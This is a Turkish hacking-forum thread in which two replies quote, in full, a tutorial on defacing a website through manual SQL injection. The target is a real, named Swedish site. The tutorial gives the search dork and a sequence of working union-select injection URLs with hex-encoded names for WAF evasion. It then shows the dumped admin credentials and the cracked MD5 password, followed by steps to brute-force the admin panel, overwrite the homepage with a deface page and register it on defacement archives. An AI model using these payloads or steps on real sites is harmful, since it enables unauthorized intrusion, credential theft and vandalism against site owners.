Manuel SQL injection ile nasıl index atılır Part 1

şıkk

şıkk

Üye
24 Eki 2023
114
52
Agent-47' Alıntı:
Herkese merhaba arkadaşlar bu konumuzda sql injection ile nasıl sitelere index basılır bunu öğreteceğim aramızda yeni başlayan insanlar var bu konu tam sizlere göre yinede bu zafiyeti bilen varsada okumanızı öneririm 3-4 dk nızı ayırıcaksınız sadece ve en azından kendinize bişeyler katmış olursunuz neyse konumuza geçelim.

Bölümler:
1- Dork yazma
2- Zafiyet Tarama
3- Zafiyeti Sömürme
4- Şifreyi Kırma
5- Admin Panel Bulma
6- Admin Panele Giriş Yapma
7- İndex Atma
8- Zone Alma
9- Bitiş

1- Dork Yazma

ilk önce arkadaşlar sql zafiyeti olan site bulmanın olmassa olmazı dorktur benim bu partta kullanacağım dork budur:

Kod: 
inurl:php?id intext:inspiration site:se

Not: arkadaşlar siteye sqli denemeleri yapmadan önce isterseniz vpn açın açmasanızda olur ama öneririm

bu dorku yazdıktan sonra 4. sayfada arkivcentrum.se diye site buldum

2mdn0qx.png


girelim bu siteye

pxx5978.png


2- Zafiyet Tarama

bu sitede url'in sonuna ' işareti koyuyorum

7cbanq9.png


3- Zafiyeti Sömürme

arkadaşlar eğer bir sitede sql açığı varsa hata da verebilir sql syntax vs. veya bunun gibi sayfada bi veri kaybı olur bu gibi şeyleri farkettiğimiz an sitede anlarız sql açığı olduğunu.
gördüğünüz gibi bizde veri kaybı oldu eğer
şimdi sitedeki kolon sayılarını çekicem kolon sayıları çekmek sql injecitonda yapmanız gereken ilk şeylerden biri.
bunu order by ile yaparız ve arkadaşlar sql sorgularında her yazdığınız kodun sonuna --+- yazın bu kod sizin yazdığınız koddan sonraki kodları (adamların yazdığı kodları) yorum satırı haline çeviriyor.

Kod: 
https://www.arkivcentrum.se/index.php?id=2+order+by+1--+-

607ehom.png


ve sitede değişiklik oldu geri geldi şimdi yine sitede veri kaybı yada hata olana kadar denemeler yapıcaz.
şuan biz siteye sadece 1 kolon mu var diye sorduk ve oda daha fazla olduğunu söyledi çünkü bir hata veri kaybı vs. olmadı sürekli denicez bunu

şimdi order by 10 yaptım ve veri kaybı yaşandı ' işareti koyduğum fotoğraf gibi oldu.
şimdi order by 8 yapıyorum yine aynı sonuç.
şimdi order by 7 yazıyorum ve sonuç:

py8ak5l.png


demekki sitede 7 kolon varmış şimdi bu kolonları ekrana yazdırıcaz bunun komutu union select <1'den kolon sayısına kadar rakamlar>

SQL: 
union+select+1,2,3,4,5,6,7

Kod: 
https://www.arkivcentrum.se/index.php?id=2'+union+select+1,2,3,4,5,6,7--+-

6lvckvj.png


kolon sayılarından herhangi biri ekrana yansımadı ' işaretini silelim belki olur

6f9zt2a.png


sitenin verileri geri geldi şimdi id=2 nin arasına - koyalım belki olur yani id=-2

dwa5xsm.png


ve gördüğünüz gibi 6 yansıdı ekrana şimdi sitenin database ismini öğrenelim kodumuz bu:

Kod: 
database()
Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,database(),7--+-

b2zbzhm.png


database ismi = arkivcentrum_searkivcentrum
şimdi tablo isimlerini öğrenelim
kod bu:
SQL: 
(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d)

şu kısım;
0x61726b697663656e7472756d5f736561726b697663656e7472756d
bizim database ismimizin hex koduna çevirilmiş halidir. bir siteyi sql ile hacklemek isterseniz ve tabloları öğrenmek için bu kodu alırsanız şu hex kodunu kendi bulduğunuz database ismi ile değiştirin ama hex koduna çevirip yazın benim gibi, wafları falan atlatmış olursunuz hem hex koduna çevirilmeyince bazen çalışmıyor

Kod: 
 https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d),7--+-

8seos0l.png


arkiv_users da büyük ihtimal ya admin kullanıcılarının bilgileri var yada üyelerin. ikiside önemli bizim için bu tablonun sütunlarını ardından da datalarını çekelim.

sütunları çekme kodu:

SQL: 
(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273)

table_name=0x61726b69765f7573657273 burdaki hex kodu tablonun ismi. başka site hacklicekseniz burdaki hex kodunu o sitedeki tablonun ismini hex koduna çevirip değiştirebilirsiniz.

Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273),7--+-

4lfsahq.png

id, user, password var id çok da önemli değil ama onuda çekelim sıkıntı yok.

SQL: 
(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users)

Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users),7--+-

2oe2kbr.png


ve gördüğünüz gibi admin bilgileri geldi, hakan diye biri var galiba türk admin var sitede :D ama hedef .se o yüzden kurallara aykırı değil diye düşünüyorum :D
admin1 büyük ihtimal en yetkili kullanıcı onun parolasını kıralım ve sitenin admin panelini bulup siteye girelim

4- Şifreyi Kırma

şimdi admin1 kullanıcısının md5 ile hashlenmiş şifresi bu:
e00cf25ad42683b3df678c61f42c6bda

bu şifreyi hashes.com sitesinden kırmayı deneyelim.

mb52wbu.png


1. yere hashinizi yazın ve 2. yere tıklayıp hashi kırmayı deneyin.

j0zfjd8.png

ve gördüğünüz gibi kırdık

kullanıcı adı: admin1
parola: admin1

kolaydı :cool:
:D aksdjaklsdj

5- Admin Panel Bulma

şimdi sitenin admin panelini bulmak için wordlist ile brute force yapıyorum.

eue9krc.jpg


6- Admin Panele Giriş Yapma

sitenin admin panelide kolaymış admin panele girelim

gsc2j1t.png


loging in... diye alert verdi ok diyelim ve şimdi admin panele girdik bu arada bazı sitelerde admin bilgisine gerek kalmadan da admin olarak panele girebilirsiniz bunu da diğer partlarda anlatabilirim

3fssonz.png


article manager'a girelim.

i2d3msh.png


bakalım bu sayfa sitede hangi sayfada

qd48dw2.png


evet anasayfayı bulmuşuz çok güzel anasayfaya index atarız.

article manager'a geri dönelim ve buna basalım html kodu olarak sayfayı düzenlemeye yarıyor.

kfu1igr.png


7- İndex Atma

adamların kendi kodları bu.
kendi kodlarımızla değiştirelim.
( eğer index kodunuz yoksa ghost hocamın yaptığı bu konudan yararlanabilirsiniz
TurkHackTeam Gövde Gösterisi Sabit İndex )

9eh7oup.png


kendi index kodumuzu yapıştırdık ve save changes'e basalım

pcrx8f4.png


sz8b3l6.png


evet indeximiz anasayfaya düşmüş bu arada ben article manager dışında diğer yerlerede index attım ondan böyle :D
şimdi zone alalım.

8- Zone Alma

( zone sitenin ekran görüntüsü alır ve site eski haline dönsede bu ekran görüntüsü sayesinde siteyi hacklediğimiz kanıtlarız. )

ben bu siteden zone alıcam;
mirror-h
notify reporta basın ve 1,2,3 şeklinde yaptığım adımları uygulayın

6sgh6ge.png


benim zone'um yüklendi ve bu şekilde:

6rqwooh.png


benim aldığım zone'a ulaşmak isterseniz linki veriyorum
benim zone'um

eğer arkadaşlar bu siteye index atıcaksanız mirrorda zone almayın çünkü TurkHackTeam adına alamazsınız ilk ben aldığım için ya başka bir nick ile alın yada başka zone sitelerinden alın

örnek zone siteleri:
zone-h.org ( bu siteyi pek önermem global bi site ama indeximiz görünmüyor )
ownzyou.com
archive.md
archive.is

9- Bitiş
Arkadaşlar eğer bu serinin devamını gelmesini istiyorsanız söyleyin çok istek gelirse 2. partını yapıcam en yakın zamanda.
Eğer düzeltmemi istediğiniz veya yanlış yaptığım yada ekstra eklemem gereken şeyler varsa belirtirseniz sevinirim.
Konumu okuduğunuz için hepinize çok teşekkür ederim. ❤️
Genişletmek için tıkla ...
Emeğine sağlık çok güzel olmuş
 
Nemesa

Nemesa

Katılımcı Üye
15 Şub 2023
285
131
System32.exe/nemesaxploit
Agent-47' Alıntı:
Herkese merhaba arkadaşlar bu konumuzda sql injection ile nasıl sitelere index basılır bunu öğreteceğim aramızda yeni başlayan insanlar var bu konu tam sizlere göre yinede bu zafiyeti bilen varsada okumanızı öneririm 3-4 dk nızı ayırıcaksınız sadece ve en azından kendinize bişeyler katmış olursunuz neyse konumuza geçelim.

Bölümler:
1- Dork yazma
2- Zafiyet Tarama
3- Zafiyeti Sömürme
4- Şifreyi Kırma
5- Admin Panel Bulma
6- Admin Panele Giriş Yapma
7- İndex Atma
8- Zone Alma
9- Bitiş

1- Dork Yazma

ilk önce arkadaşlar sql zafiyeti olan site bulmanın olmassa olmazı dorktur benim bu partta kullanacağım dork budur:

Kod: 
inurl:php?id intext:inspiration site:se

Not: arkadaşlar siteye sqli denemeleri yapmadan önce isterseniz vpn açın açmasanızda olur ama öneririm

bu dorku yazdıktan sonra 4. sayfada arkivcentrum.se diye site buldum

2mdn0qx.png


girelim bu siteye

pxx5978.png


2- Zafiyet Tarama

bu sitede url'in sonuna ' işareti koyuyorum

7cbanq9.png


3- Zafiyeti Sömürme

arkadaşlar eğer bir sitede sql açığı varsa hata da verebilir sql syntax vs. veya bunun gibi sayfada bi veri kaybı olur bu gibi şeyleri farkettiğimiz an sitede anlarız sql açığı olduğunu.
gördüğünüz gibi bizde veri kaybı oldu eğer
şimdi sitedeki kolon sayılarını çekicem kolon sayıları çekmek sql injecitonda yapmanız gereken ilk şeylerden biri.
bunu order by ile yaparız ve arkadaşlar sql sorgularında her yazdığınız kodun sonuna --+- yazın bu kod sizin yazdığınız koddan sonraki kodları (adamların yazdığı kodları) yorum satırı haline çeviriyor.

Kod: 
https://www.arkivcentrum.se/index.php?id=2+order+by+1--+-

607ehom.png


ve sitede değişiklik oldu geri geldi şimdi yine sitede veri kaybı yada hata olana kadar denemeler yapıcaz.
şuan biz siteye sadece 1 kolon mu var diye sorduk ve oda daha fazla olduğunu söyledi çünkü bir hata veri kaybı vs. olmadı sürekli denicez bunu

şimdi order by 10 yaptım ve veri kaybı yaşandı ' işareti koyduğum fotoğraf gibi oldu.
şimdi order by 8 yapıyorum yine aynı sonuç.
şimdi order by 7 yazıyorum ve sonuç:

py8ak5l.png


demekki sitede 7 kolon varmış şimdi bu kolonları ekrana yazdırıcaz bunun komutu union select <1'den kolon sayısına kadar rakamlar>

SQL: 
union+select+1,2,3,4,5,6,7

Kod: 
https://www.arkivcentrum.se/index.php?id=2'+union+select+1,2,3,4,5,6,7--+-

6lvckvj.png


kolon sayılarından herhangi biri ekrana yansımadı ' işaretini silelim belki olur

6f9zt2a.png


sitenin verileri geri geldi şimdi id=2 nin arasına - koyalım belki olur yani id=-2

dwa5xsm.png


ve gördüğünüz gibi 6 yansıdı ekrana şimdi sitenin database ismini öğrenelim kodumuz bu:

Kod: 
database()
Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,database(),7--+-

b2zbzhm.png


database ismi = arkivcentrum_searkivcentrum
şimdi tablo isimlerini öğrenelim
kod bu:
SQL: 
(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d)

şu kısım;
0x61726b697663656e7472756d5f736561726b697663656e7472756d
bizim database ismimizin hex koduna çevirilmiş halidir. bir siteyi sql ile hacklemek isterseniz ve tabloları öğrenmek için bu kodu alırsanız şu hex kodunu kendi bulduğunuz database ismi ile değiştirin ama hex koduna çevirip yazın benim gibi, wafları falan atlatmış olursunuz hem hex koduna çevirilmeyince bazen çalışmıyor

Kod: 
 https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d),7--+-

8seos0l.png


arkiv_users da büyük ihtimal ya admin kullanıcılarının bilgileri var yada üyelerin. ikiside önemli bizim için bu tablonun sütunlarını ardından da datalarını çekelim.

sütunları çekme kodu:

SQL: 
(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273)

table_name=0x61726b69765f7573657273 burdaki hex kodu tablonun ismi. başka site hacklicekseniz burdaki hex kodunu o sitedeki tablonun ismini hex koduna çevirip değiştirebilirsiniz.

Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273),7--+-

4lfsahq.png

id, user, password var id çok da önemli değil ama onuda çekelim sıkıntı yok.

SQL: 
(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users)

Kod: 
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users),7--+-

2oe2kbr.png


ve gördüğünüz gibi admin bilgileri geldi, hakan diye biri var galiba türk admin var sitede :D ama hedef .se o yüzden kurallara aykırı değil diye düşünüyorum :D
admin1 büyük ihtimal en yetkili kullanıcı onun parolasını kıralım ve sitenin admin panelini bulup siteye girelim

4- Şifreyi Kırma

şimdi admin1 kullanıcısının md5 ile hashlenmiş şifresi bu:
e00cf25ad42683b3df678c61f42c6bda

bu şifreyi hashes.com sitesinden kırmayı deneyelim.

mb52wbu.png


1. yere hashinizi yazın ve 2. yere tıklayıp hashi kırmayı deneyin.

j0zfjd8.png

ve gördüğünüz gibi kırdık

kullanıcı adı: admin1
parola: admin1

kolaydı :cool:
:D aksdjaklsdj

5- Admin Panel Bulma

şimdi sitenin admin panelini bulmak için wordlist ile brute force yapıyorum.

eue9krc.jpg


6- Admin Panele Giriş Yapma

sitenin admin panelide kolaymış admin panele girelim

gsc2j1t.png


loging in... diye alert verdi ok diyelim ve şimdi admin panele girdik bu arada bazı sitelerde admin bilgisine gerek kalmadan da admin olarak panele girebilirsiniz bunu da diğer partlarda anlatabilirim

3fssonz.png


article manager'a girelim.

i2d3msh.png


bakalım bu sayfa sitede hangi sayfada

qd48dw2.png


evet anasayfayı bulmuşuz çok güzel anasayfaya index atarız.

article manager'a geri dönelim ve buna basalım html kodu olarak sayfayı düzenlemeye yarıyor.

kfu1igr.png


7- İndex Atma

adamların kendi kodları bu.
kendi kodlarımızla değiştirelim.
( eğer index kodunuz yoksa ghost hocamın yaptığı bu konudan yararlanabilirsiniz
TurkHackTeam Gövde Gösterisi Sabit İndex )

9eh7oup.png


kendi index kodumuzu yapıştırdık ve save changes'e basalım

pcrx8f4.png


sz8b3l6.png


evet indeximiz anasayfaya düşmüş bu arada ben article manager dışında diğer yerlerede index attım ondan böyle :D
şimdi zone alalım.

8- Zone Alma

( zone sitenin ekran görüntüsü alır ve site eski haline dönsede bu ekran görüntüsü sayesinde siteyi hacklediğimiz kanıtlarız. )

ben bu siteden zone alıcam;
mirror-h
notify reporta basın ve 1,2,3 şeklinde yaptığım adımları uygulayın

6sgh6ge.png


benim zone'um yüklendi ve bu şekilde:

6rqwooh.png


benim aldığım zone'a ulaşmak isterseniz linki veriyorum
benim zone'um

eğer arkadaşlar bu siteye index atıcaksanız mirrorda zone almayın çünkü TurkHackTeam adına alamazsınız ilk ben aldığım için ya başka bir nick ile alın yada başka zone sitelerinden alın

örnek zone siteleri:
zone-h.org ( bu siteyi pek önermem global bi site ama indeximiz görünmüyor )
ownzyou.com
archive.md
archive.is

9- Bitiş
Arkadaşlar eğer bu serinin devamını gelmesini istiyorsanız söyleyin çok istek gelirse 2. partını yapıcam en yakın zamanda.
Eğer düzeltmemi istediğiniz veya yanlış yaptığım yada ekstra eklemem gereken şeyler varsa belirtirseniz sevinirim.
Konumu okuduğunuz için hepinize çok teşekkür ederim. ❤️
Genişletmek için tıkla ...
uzun süredir anlamadığım bir konuyu anladım çok sağolun hocam.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.